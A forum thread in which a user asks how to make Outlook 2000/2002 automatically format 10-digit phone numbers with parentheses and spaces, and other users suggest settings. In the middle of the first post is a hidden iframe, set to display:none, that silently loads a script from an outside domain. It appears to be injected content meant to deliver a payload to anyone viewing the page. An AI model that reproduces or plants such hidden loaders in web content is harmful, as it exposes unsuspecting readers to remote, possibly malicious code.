+ Reply to Thread

In Outlook: Auto place parenthesis around area code & add spaces

My question is this. In Microsoft Outlook 2000/2002. How can I set Outlook to automatically add parenthesis around the area code and add spaces where they need to be after I enter in my 10 digit phone number? I thought there was a way to do this where when I push to tap key to go to the next field, it would convert my 10 digit number into a phone number with parenthesis and spaces. I have been having to add the parenthesis and spaces myself which takes too much time. Also do I have to manually do the same thing on my palm or run the risk of duplication? Thank you in advance for your responses. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Chris Mattix
    Personal Real Estate Consultant

Can't answer the "how to", but can tell you for sure that Outlook 2000 does this. If I just type in either 7 or 10 digits and hit tab or enter, the full 10 digits, with paretheses (and local area code, if I only entered 7 digits), does come up automatically.....There's probably a setting under "options" for contacts. If no one else answers, I'll try to look at this when I get to work....

The setting isn't under options. I've looked everywhere. Thanks anyway.
    Chris Mattix

Found it- not exactly intuitive! From Outlook Help:

Notes
    If you omit the country code and area code from the phone number, the automatic phone dialer uses settings from Dialing Properties in the New Call dialog box (on the Actions menu, point to Call, and then click New Call).

So- go to New Call, hit Dialing Properties, and enter area code there....

I'm not trying to have the area code automatically added to a seven digit number that I enter into contacts. Here's what I want to happen. I enter a ten digit number (no spaces or parenthesis) into a phone field in contacts. When I push tap, Outlook automatically adds the parenthesis around the area code and enters in the appropriate spaces. THere is suppose to be a setting to allow that to happen.
    Chris Mattix